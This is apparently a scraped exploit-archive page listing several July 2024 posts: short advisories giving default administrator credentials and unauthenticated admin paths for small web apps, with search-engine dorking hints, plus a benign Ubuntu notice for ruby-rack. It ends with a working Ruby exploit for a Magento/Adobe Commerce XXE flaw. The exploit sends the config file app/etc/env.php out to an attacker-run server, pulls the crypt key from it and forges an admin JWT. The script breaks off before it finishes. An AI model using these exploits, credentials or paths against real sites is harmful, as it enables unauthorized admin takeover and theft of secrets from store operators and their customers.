Innue Business Live Chat version 2.5 suffers from an ignored default credential vulnerability.

**Innue Business Live Chat 2.5 Insecure Settings**

Posted Jul 29, 2024

Authored by indoushka

Innue Business Live Chat version 2.5 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 69cf2bb9bb7d7ff376d99fe228145e43a3757fab2416d6aff6f75b372ddf2d3a

Download | Favorite | View

**Innue Business Live Chat 2.5 Insecure Settings**

    ====================================================================================================================================| # Title     : innue business live chat v2.5 Insecure Settings Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/business-live-chat-software.php                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin[+] https://www/127.0.0.1/vmi1941086contaboservernet/loginGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,161)
*   Arbitrary (16,833)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,014)
*   Encryption (2,389)
*   Exploit (53,083)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,179)
*   Local (14,782)
*   Magazine (586)
*   Overflow (13,153)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,618)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,589)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,911)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,556)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,700)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Innue Business Live Chat 2.5 Insecure Settings

Multi Store Inventory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**Multi Store Inventory Management System 1.0 Insecure Direct Object Reference**

Posted Jul 25, 2024

Authored by indoushka

Multi Store Inventory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 32be0fec962b67faf38d315a9d6d5a0c83204e2e599b0319b92fa81fc435926a

Download | Favorite | View

**Multi Store Inventory Management System 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Multi Store Inventory Management System v1.0 IDOR Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/multistore_demo/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,131)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,001)
*   Encryption (2,389)
*   Exploit (53,073)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,169)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,616)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,903)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,527)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,402)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,689)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Multi Store Inventory Management System 1.0 Insecure Direct Object Reference

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

**SIM Wisuda 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

SIM Wisuda version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 7fed84c74a95aca63927ebf377895e9a07606b145886012809d45f932101a348

Download | Favorite | View

**SIM Wisuda 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : SIM Wisuda v1.0 IDOR Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://academic.uii.ac.id/wisuda/                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /login/apps/?menu=Lulusan[+] https://www/127.0.0.1/wisuda.uika-bogor.ac.id/login/apps/?menu=LulusanGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

SIM Wisuda 1.0 Insecure Direct Object Reference

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

Posted Jul 24, 2024

Authored by indoushka

Webdenim AppUI version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 3418251e6b23a29fe38369d103a67d4c4c7e084f78a767a8b4660ce397493457

Download | Favorite | View

**Webdenim AppUI 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Webdenim AppUI v1.0 IDOR Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codentheme.com/item/appui-free-responsive-html-vuejs-angularjs-admin-dashboard/                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/listandrelaxcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,109)
*   Arbitrary (16,828)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,779)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,997)
*   Encryption (2,389)
*   Exploit (53,065)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,167)
*   Local (14,774)
*   Magazine (586)
*   Overflow (13,149)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,613)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,271)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,588)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,900)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,505)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,383)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,686)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Webdenim AppUI 1.0 Insecure Direct Object Reference

Ubuntu Security Notice 6905-1 - It was discovered that Rack incorrectly handled certain regular expressions. A remote attacker could possibly use this issue to cause Rack to consume resources, leading to a denial of service. It was discovered that Rack incorrectly handled Multipart MIME parsing. A remote attacker could possibly use this issue to cause Rack to consume resources, leading to a denial of service. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6905-1  
July 23, 2024

ruby-rack vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Rack could be made to consume resources and cause long delays if it  
processed certain input.

Software Description:  
- ruby-rack: modular Ruby webserver interface

Details:

It was discovered that Rack incorrectly handled certain regular  
expressions. A remote attacker could possibly use this issue to cause  
Rack to consume resources, leading to a denial of service.  
(CVE-2023-27539)

It was discovered that Rack incorrectly handled Multipart MIME parsing.  
A remote attacker could possibly use this issue to cause Rack to consume  
resources, leading to a denial of service. This issue only affected  
Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2023-27530)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   ruby-rack                       2.1.4-5ubuntu1+esm4  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   ruby-rack                       2.0.7-2ubuntu0.1+esm4  
                                   Available with Ubuntu Pro

Ubuntu 18.04 LTS  
   ruby-rack                       1.6.4-4ubuntu0.2+esm5  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   ruby-rack                       1.6.4-3ubuntu0.2+esm5  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   ruby-rack                       1.5.2-3+deb8u3ubuntu1~esm7  
                                   Available with Ubuntu Pro

After a standard system update you need to restart any applications using  
Rack to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6905-1  
   CVE-2023-27530, CVE-2023-27539

Ubuntu Security Notice USN-6905-1

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

Adobe Commerce and Magento Open Source are affected by an XML injection vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. Versions Affected include Adobe Commerce and Magento Open Source 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8, and earlier. This exploit uses the arbitrary file reading aspect of the issue to impersonate a user.

#!/usr/bin/env ruby -W0

require 'bundler'  
Bundler.require(:default)

DEBUG = false  
USE_PROXY = false  
PROXY_ADDR = '127.0.0.1'  
PROXY_PORT = 8080

def debug(msg)  
  puts msg.inspect if DEBUG  
end

def rand_text(length = 8)  
  # random string generator  
  o = [('a'..'z'), ('A'..'Z')].map(&:to_a).flatten  
  (0...length).map { o[rand(o.length)] }.join  
end

def dtd_param_name  
  @dtd_param_name ||= rand_text()  
end

def ent_eval  
  @ent_eval ||= rand_text()  
end

def leak_param_name  
  @leak_param_name ||= rand_text()  
end

def remote_addr  
  @remote_addr ||= "http://#{@srv_host.host}:#{@srv_host.port}"  
end

def http  
  @http ||= begin  
    http = if USE_PROXY  
             Net::HTTP.new(@target_uri.host, @target_uri.port, PROXY_ADDR, PROXY_PORT)  
           else  
             Net::HTTP.new(@target_uri.host, @target_uri.port)  
           end

    if @target_uri.port == 443 || @target_uri.to_s.match(%r{http(s).*})  
      http.use_ssl = true  
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE  
    end

    http.set_debug_output($stderr) if DEBUG  
    http  
  end  
end

def make_xxe_dtd  
  filter_path = 'php://filter/convert.base64-encode/resource=../app/etc/env.php'  
  ent_file = rand_text()  
  %(  
    <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">  
    <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM '#{remote_addr}/?#{leak_param_name}=%#{ent_file};'>">  
  )  
end

def xxe_xml_data()  
  param_entity_name = rand_text()

  xml = "<?xml version='1.0' ?>"  
  xml += "<!DOCTYPE #{rand_text()}"  
  xml += '['  
  xml += "  <!ELEMENT #{rand_text()} ANY >"  
  xml += "    <!ENTITY % #{param_entity_name} SYSTEM '#{remote_addr}/#{rand_text}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "  
  xml += ']'  
  xml += "> <r>&#{ent_eval};</r>"

  xml  
end

LIBXML_NOENT = 2  
LIBXML_PARSEHUGE = 524288

def xxe_request()  
  debug('Sending XXE request')

  signature = rand_text().capitalize

  post_data = {  
    "address": {  
      "#{signature}": rand_text(),  
      "totalsCollector": {  
        "collectorList": {  
          "totalCollector": {  
            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {  
              "data": xxe_xml_data(),  
              "options": LIBXML_NOENT|LIBXML_PARSEHUGE  
            }  
          }  
        }  
      }  
    }  
  }.to_json  
  req = Net::HTTP::Post.new('/rest/V1/guest-carts/1/estimate-shipping-methods')  
  req.body = post_data  
  req.content_type = 'application/json'  
  # req.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)'  
  res = http.request(req)

  raise RuntimeError, "Server returned unexpected response" unless res&.code == '400'

  body = JSON.parse(res.body)

  raise RuntimeError, "Server returned unexpected response" unless body['parameters']['fieldName'] == signature

end

TARGET_USER_ID = 1

USER_TYPE_INTEGRATION = 1;  
USER_TYPE_ADMIN = 2;  
USER_TYPE_CUSTOMER = 3;  
USER_TYPE_GUEST = 4;

def jwt_encode(key, algorithm = 'HS256')  
  def pad_key(key, total_length, pad_char)  
    left_padding = (total_length - key.length) / 2  
    right_padding = total_length - key.length - left_padding  
    pad_char * left_padding + key + pad_char * right_padding  
  end  
  header = {  
    kid: "1",  
    alg: "HS256"  
  }

  payload = {  
    uid: TARGET_USER_ID,    
    utypid: USER_TYPE_ADMIN,  
    iat: Time.now.to_i,  # Token issue time',  
    exp: Time.now.to_i + 10 * 24 * 60 * 60,  # Token expiration time  
  }

  def base64_url_encode(str)  
    Base64.urlsafe_encode64(str).tr('=', '')  
  end

  padded_key = pad_key(key, 2048, '&')

  encoded_header = base64_url_encode(header.to_json)  
  encoded_payload = base64_url_encode(payload.to_json)

  # Create the signature  
  data = "#{encoded_header}.#{encoded_payload}"  
  signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), padded_key, data)  
  encoded_signature = base64_url_encode(signature)

  # Combine the header, payload, and signature to form the JWT  
  "#{encoded_header}.#{encoded_payload}.#{encoded_signature}"

end

def exploit()  
  begin  
    puts "Starting web server..."  
    body = make_xxe_dtd()  
    file_content = nil  
    file_content_reader, file_content_writer = IO.pipe  
    WEBrick::HTTPRequest.const_set("MAX_URI_LENGTH", 10240)  
    wbserver_options = {  
      :BindAddress => '0.0.0.0',  
      :Port => @srv_host.port,  
      :Logger => WEBrick::Log.new($stderr, WEBrick::Log::DEBUG),  
      :AccessLog => [],  
      # :RequestTimeout => 300,       # Increase request timeout  
      # :RequestMaxUriLength => 100240 # Increase max URI length  
    }  
    wbserver_options[:Logger] = WEBrick::Log.new("/dev/null") unless DEBUG

    pid = Process.fork do  
      file_content_reader.close

      server = WEBrick::HTTPServer.new(wbserver_options)  
      server.mount_proc '/' do |req, res|  
        if req.path =~ /\.dtd$/  
          res.body = body  
        elsif req.query_string.match(/#{leak_param_name}=(.*)/)  
          file_content = Base64.decode64(Regexp.last_match(1))  
          # puts "Received leaked file content:\n#{file_content}"  
          file_content_writer.puts file_content

        else  
          res.body = 'OK'  
        end  
      end

      trap("INT") do  
        server.shutdown  
        file_content_writer.close  
      end

      server.start  
    end

    sleep(1)  
    xxe_request()  
    file_content_writer.close

    begin  
      # Set a timeout for reading from the pipe  
      Timeout.timeout(5) do  # 5 seconds timeout, adjust as necessary  
        file_content = file_content_reader.read_nonblock(10000)  # Adjust the size as necessary  
      end  
    rescue Timeout::Error  
      puts "Reading from pipe timed out."  
    rescue EOFError  
      puts "End of file reached."  
    ensure  
      file_content_reader.close  
    end

    # Use file_content as needed here  
    if file_content  
      # puts "Successfully read file content:\n#{file_content}"  
      key = file_content.match(/'key' => '(.*)'/)[1]  
      if key  
        debug "Found key: #{key}"  
        jwt = jwt_encode(key)  
        puts "Generated JWT: #{jwt}"  
        puts("Sending request with JWT to coupons endpoint")  
